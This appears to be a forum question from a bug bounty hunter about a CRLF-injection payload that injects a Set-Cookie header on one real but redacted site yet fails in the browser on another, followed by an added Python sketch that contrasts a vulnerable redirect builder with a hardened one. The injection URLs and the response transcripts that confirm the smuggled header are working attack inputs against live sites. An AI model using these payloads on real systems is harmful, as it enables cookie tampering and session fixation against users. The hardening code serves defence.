Cookie is not being set after CRLF injection in one domain but is set in another domain. How can I bypass/set it?


OK, I am facing a very weird behaviour that both sets and doesn't set the cookie. So, first, I have found CRLF injection in 2 domains, redacted.de and redacted_another.com. When I go to the redacted_another.com vulnerable URL, the cookie gets set in firefox-esr. This works in the browser. The first vulnerable domain I encountered had this URL:

https://www.redacted_another.com/lp/%0ASet-Cookie:%20dipesh=yadav

I can view the cookies using the developer tools. This is the default behaviour, I think. The next domain I encountered had these vulnerable URLs, but it didn't work in the browser 🙁:

http://www.redacted.de/forum/%0aSet-Cookie:%20dipesh=yadav

http://www.redacted.de/sso/registration/account/%3f%0d%0aSet-Cookie:%20dipesh=yadav

But when I visit any of these URLs from redacted.de, it doesn't work in the browser. Also, both redacted_another.com and redacted.de set the cookie in the curl response. This is what it looks like for both redacted domains, but the first one works in the browser and the second doesn't. Working curl request:

```
root@kali-linux:~/redacted/# http https://www.redacted.com/lp/%0ASet-Cookie:%20dipesh=yadav

HTTP/2 301
date: Thu, 13 Aug 2020 15:02:53 GMT
content-type: text/html
content-length: 185
location: https://www.redacted.com/lp/redirects/?olp=/lp/
set-cookie: dipesh=yadav
expires: Thu, 20 Aug 2020 15:02:53 GMT
cache-control: max-age=604800

HTTP/2 200
date: Thu, 13 Aug 2020 15:02:53 GMT
content-type: text/html
content-length: 1452
vary: Accept-Encoding
last-modified: Tue, 04 Feb 2020 15:54:26 GMT
etag: "redacted"
expires: Thu, 20 Aug 2020 15:02:53 GMT
cache-control: max-age=604800
access-control-allow-origin: *
accept-ranges: bytes
```

NOT WORKING REQUEST:

```
root@kali-linux:~/redacted# http http://www.redacted.de/sso/registration/account/%0aSet-Cookie:%20bugbounty=bugbountyplz

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 13 Aug 2020 15:05:04 GMT
Content-Type: text/html
Content-Length: 162
Location: https://www.redacted.de/sso/registration/account/
Set-Cookie: bugbounty=bugbountyplz
Last-Modified: Thu, 13 Aug 2020 15:05:04 GMT
Cache-Control: private
Age: 0
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Connection: keep-alive

HTTP/2 200
server: nginx
date: Thu, 13 Aug 2020 15:05:05 GMT
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
access-control-allow-credentials: true
access-control-allow-origin: https://www.redacted.de
last-modified: Thu, 13 Aug 2020 15:05:05 GMT
cache-control: no-cache, private
age: 0
strict-transport-security: max-age=15768000
x-frame-options: DENY
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
```

Can anyone help me with this? What's the problem that doesn't let me set the cookie in redacted.de, when I can set the cookie in redacted_another.com?
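
Seen from the server side, both transcripts are consistent with the 301 handler copying the percent-decoded request path into the `Location` header, so the decoded line feed ends that header and the remainder is parsed as a new one. The following is an added example, not part of the original post and not either site's code: a Python sketch of such a redirect builder beside a hardened version. The host `example.test`, the function names and the sample path are constructed for illustration.

```python
import re
from urllib.parse import quote, unquote

# Constructed sample: same shape as the paths in the post, hypothetical host/values.
HOST = "example.test"
SAMPLE_PATH = "/forum/%0aSet-Cookie:%20k=v"

# CR, LF and every other ASCII control character are illegal in a header value.
CTL = re.compile(r"[\x00-\x1f\x7f]")


def unsafe_location(host, raw_path):
    """Vulnerable pattern: the percent-decoded path goes straight into the header."""
    return f"https://{host}{unquote(raw_path)}"


def safe_location(host, raw_path):
    """Hardened pattern: decode once, refuse control characters, re-encode."""
    decoded = unquote(raw_path)
    if CTL.search(decoded):
        raise ValueError("control character in redirect target")
    return f"https://{host}{quote(decoded, safe='/')}"


def response_header_names(location):
    """Serialise a 301 and list the header names a lenient client would parse."""
    raw = f"HTTP/1.1 301 Moved Permanently\r\nLocation: {location}\r\n\r\n"
    head = raw.split("\r\n\r\n", 1)[0]
    lines = re.split(r"\r\n|\n", head)[1:]  # many parsers accept a bare LF
    return [line.split(":", 1)[0].lower() for line in lines]


if __name__ == "__main__":
    print(response_header_names(unsafe_location(HOST, SAMPLE_PATH)))
    try:
        safe_location(HOST, SAMPLE_PATH)
    except ValueError as exc:
        print("rejected:", exc)
    print(safe_location(HOST, "/forum/a%20b"))
```

The hardened builder treats the path as path-only input (a `?` is re-encoded), which is an assumption of this sketch; a handler that forwards query strings would validate and encode them separately.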